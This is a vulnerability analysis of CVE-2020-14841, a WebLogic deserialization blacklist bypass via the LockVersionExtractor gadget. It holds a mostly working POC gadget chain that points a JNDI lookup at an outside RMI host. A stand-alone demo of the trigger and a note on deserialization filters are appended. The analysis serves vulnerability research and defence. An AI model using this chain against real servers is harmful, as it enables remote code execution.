2025-04-01 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article walks through the analysis of CVE-2020-14841, a bypass of the WebLogic blacklist that again leads to JNDI injection through a Coherence/EclipseLink gadget. It is shared as a reference; readers familiar with CVE-2020-2555 and CVE-2020-14645 will recognise the pattern.
Brief introduction
Diffing the blacklist shipped in the WebLogic upgrade package shows that this class was newly added to it:
oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor
LockVersionExtractor analysis
The decompiled class (serialization methods omitted from the listing):
package oracle.eclipselink.coherence.integrated.internal.cache;

import com.tangosol.io.ExternalizableLite;
import com.tangosol.io.pof.PofReader;
import com.tangosol.io.pof.PofWriter;
import com.tangosol.io.pof.PortableObject;
import com.tangosol.util.ExternalizableHelper;
import com.tangosol.util.ValueExtractor;
import java.io.DataInput;
import java.io.DataOutput;
import java.io.IOException;
import oracle.eclipselink.coherence.integrated.cache.Wrapper;
import oracle.eclipselink.coherence.integrated.internal.querying.EclipseLinkExtractor;
import org.eclipse.persistence.mappings.AttributeAccessor;

public class LockVersionExtractor implements ValueExtractor, ExternalizableLite, PortableObject, EclipseLinkExtractor {
    // both fields are attacker-controlled once the object is deserialized
    protected AttributeAccessor accessor;
    protected String className;

    public LockVersionExtractor() {
    }

    public LockVersionExtractor(AttributeAccessor accessor, String className) {
        this.accessor = accessor;
        this.className = className;
    }

    public Object extract(Object arg0) {
        if (arg0 == null) {
            return null;
        } else {
            if (arg0 instanceof Wrapper) {
                arg0 = ((Wrapper) arg0).unwrap();
            }
            if (!this.accessor.isInitialized()) {
                // resolves the getter/setter by name on the element's class
                this.accessor.initializeAttributes(arg0.getClass());
            }
            // the trigger point: delegates to the attacker-supplied AttributeAccessor
            return this.accessor.getAttributeValueFromObject(arg0);
        }
    }

    // readExternal/writeExternal and the PortableObject methods are omitted here
}
The code shows that, as with CVE-2020-2555, this is a ValueExtractor whose extract() can be reached during deserialization and is used in the same way. The trigger point is this.accessor.getAttributeValueFromObject. AttributeAccessor is abstract, so we need a concrete subclass that gives a usable execution path; MethodAttributeAccessor is one candidate:
package org.eclipse.persistence.internal.descriptors;

import java.lang.reflect.Method;
import java.security.AccessController;
import java.security.PrivilegedActionException;
import org.eclipse.persistence.exceptions.DescriptorException;
import org.eclipse.persistence.internal.security.PrivilegedAccessHelper;
import org.eclipse.persistence.internal.security.PrivilegedMethodInvoker;
import org.eclipse.persistence.mappings.AttributeAccessor;

public class MethodAttributeAccessor extends AttributeAccessor {
    protected String setMethodName = "";
    protected String getMethodName;
    protected transient Method setMethod;
    protected transient Method getMethod;

    public Object getAttributeValueFromObject(Object anObject) throws DescriptorException {
        // parameters is always null here, so the getter is invoked with no arguments
        return this.getAttributeValueFromObject(anObject, (Object[]) null);
    }

    protected Object getAttributeValueFromObject(Object anObject, Object[] parameters) throws DescriptorException {
        try {
            if (PrivilegedAccessHelper.shouldUsePrivilegedAccess()) {
                try {
                    return AccessController.doPrivileged(new PrivilegedMethodInvoker(this.getGetMethod(), anObject, parameters));
                } catch (PrivilegedActionException var5) {
                    Exception throwableException = var5.getException();
                    if (throwableException instanceof IllegalAccessException) {
                        throw DescriptorException.illegalAccessWhileGettingValueThruMethodAccessor(this.getGetMethodName(), anObject.getClass().getName(), throwableException);
                    } else {
                        throw DescriptorException.targetInvocationWhileGettingValueThruMethodAccessor(this.getGetMethodName(), anObject.getClass().getName(), throwableException);
                    }
                }
            } else {
                // getMethod was resolved by name in initializeAttributes(); reflective call with no arguments
                return this.getMethod.invoke(anObject, parameters);
            }
        // ... catch blocks and the rest of the method are omitted from the listing
The limitation of getAttributeValueFromObject in MethodAttributeAccessor is that the getter is invoked with a null parameter array, so only methods that take no arguments can be called. That constraint immediately recalls CVE-2020-14645 from July, which also reaches a JNDI lookup through a zero-argument getter (JdbcRowSetImpl.getDatabaseMetaData()).
Following that template, the POC is as follows:
import com.sun.rowset.JdbcRowSetImpl;
import com.tangosol.util.comparator.ExtractorComparator;
import oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor;
import org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor;
import ysoserial.payloads.util.Reflections;   // ysoserial helper for writing private fields
import java.lang.reflect.Field;
import java.util.PriorityQueue;

// POC
// JdbcRowSetImpl is the sink: getDatabaseMetaData() connects using the data source name,
// which is resolved through a JNDI lookup
JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
jdbcRowSet.setDataSourceName("rmi://192.168.3.254:8888/xsmd");

// MethodAttributeAccessor invokes the zero-argument getter named here by reflection
MethodAttributeAccessor methodAttributeAccessor = new MethodAttributeAccessor();
methodAttributeAccessor.setGetMethodName("getDatabaseMetaData");
methodAttributeAccessor.setIsWriteOnly(true);
methodAttributeAccessor.setAttributeName("UnicodeSec");

// LockVersionExtractor (the newly blacklisted class) calls accessor.getAttributeValueFromObject()
LockVersionExtractor extractor = new LockVersionExtractor(methodAttributeAccessor, "UnicodeSec");

// ExtractorComparator.compare() -> extractor.extract(); PriorityQueue.readObject() calls compare()
// while re-heapifying, so the chain fires during deserialization
final ExtractorComparator comparator = new ExtractorComparator(extractor);
final PriorityQueue queue = new PriorityQueue(2, comparator);
// the two elements are written reflectively so that compare() does not run while building the payload
Object[] Q = new Object[]{jdbcRowSet, jdbcRowSet};
Reflections.setFieldValue(queue, "queue", Q);
Reflections.setFieldValue(queue, "size", 2);
Field comparatorF = queue.getClass().getDeclaredField("comparator");
comparatorF.setAccessible(true);
comparatorF.set(queue, new ExtractorComparator(extractor));
// queue is then serialized and delivered to the target's deserialization entry point (not shown here)
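To make the execution path above and the POC concrete without a WebLogic, Coherence or EclipseLink installation, here is an added stand-alone model of the trigger (my own illustration, not code from the article or from its authors). The nested classes Sink and GetterComparator are assumed stand-ins for JdbcRowSetImpl and for the ExtractorComparator/LockVersionExtractor/MethodAttributeAccessor chain respectively; everything else is the JDK. It shows that PriorityQueue.readObject() reaches a string-named, zero-argument getter through compare(), and that a blacklist-style deserialization filter only helps once the specific gadget class is listed, which is the situation the article describes. It requires Java 9 or later for java.io.ObjectInputFilter.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.lang.reflect.Method;
import java.util.Comparator;
import java.util.PriorityQueue;

/**
 * Model of the trigger path used by the POC:
 *   PriorityQueue.readObject() -> heapify() -> Comparator.compare()
 *     -> extract() -> reflective call of a getter named by a String, with no arguments.
 * Sink and GetterComparator are assumed stand-ins; no WebLogic/Coherence/EclipseLink classes are used.
 */
public class PriorityQueueTriggerDemo {

    /** Stand-in for JdbcRowSetImpl: its zero-argument getter records that it was invoked. */
    public static class Sink implements Serializable {
        private static final long serialVersionUID = 1L;
        static volatile boolean fired = false;
        public Object getDatabaseMetaData() {
            fired = true;                 // the real sink performs a JNDI lookup here
            return null;
        }
    }

    /** Stand-in for ExtractorComparator(LockVersionExtractor(MethodAttributeAccessor)). */
    public static class GetterComparator implements Comparator<Object>, Serializable {
        private static final long serialVersionUID = 1L;
        private final String getMethodName;   // mirrors MethodAttributeAccessor.getMethodName
        public GetterComparator(String getMethodName) { this.getMethodName = getMethodName; }

        private Object extract(Object target) {
            try {
                // getMethod(name) without parameter types resolves only zero-argument methods,
                // and invoke(target) passes no arguments: the limitation noted in the article
                Method getter = target.getClass().getMethod(getMethodName);
                return getter.invoke(target);
            } catch (ReflectiveOperationException e) {
                throw new IllegalStateException(e);
            }
        }

        @Override
        public int compare(Object a, Object b) {
            extract(a);
            extract(b);
            return 0;
        }
    }

    /** Builds the serialized payload: a two-element PriorityQueue owning the comparator. */
    public static byte[] buildPayload() throws Exception {
        PriorityQueue<Object> queue = new PriorityQueue<>(2, new GetterComparator("getDatabaseMetaData"));
        // add() runs compare() once on the second insert; the POC avoids that by writing the
        // "queue"/"size" fields reflectively. Here the sink is harmless, so the flag is simply reset.
        queue.add(new Sink());
        queue.add(new Sink());
        Sink.fired = false;

        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(queue);
        }
        return bos.toByteArray();
    }

    /** Deserializes without a filter: heapify() calls compare(), which reaches the getter. */
    public static boolean deserializeUnfiltered(byte[] payload) throws Exception {
        Sink.fired = false;
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(payload))) {
            ois.readObject();
        }
        return Sink.fired;   // true
    }

    /** Deserializes behind a blacklist-style JEP 290 filter that rejects the comparator class. */
    public static boolean deserializeWithBlacklist(byte[] payload) throws Exception {
        Sink.fired = false;
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
                "!" + GetterComparator.class.getName() + ";*");
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(payload))) {
            ois.setObjectInputFilter(filter);
            ois.readObject();
        } catch (InvalidClassException rejected) {
            // ObjectInputStream throws InvalidClassException when the filter status is REJECTED;
            // the comparator is read before the elements, so nothing downstream is instantiated
            return Sink.fired;   // false
        }
        throw new AssertionError("filter did not reject the comparator");
    }

    public static void main(String[] args) throws Exception {
        byte[] payload = buildPayload();
        System.out.println("unfiltered readObject reached the getter:  " + deserializeUnfiltered(payload));
        System.out.println("blacklisted readObject reached the getter: " + deserializeWithBlacklist(payload));
    }
}
```

The filter in deserializeWithBlacklist names one comparator class and allows everything else, which is exactly the shape of the WebLogic blacklist: swapping GetterComparator for a differently named class with the same behaviour passes it untouched until that name is added, as happened with LockVersionExtractor in this patch. An allow-list filter, or refusing Comparator implementations outside the application's own packages, does not have that gap.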
This concludes the analysis of the CVE-2020-14841 WebLogic JNDI injection bypass.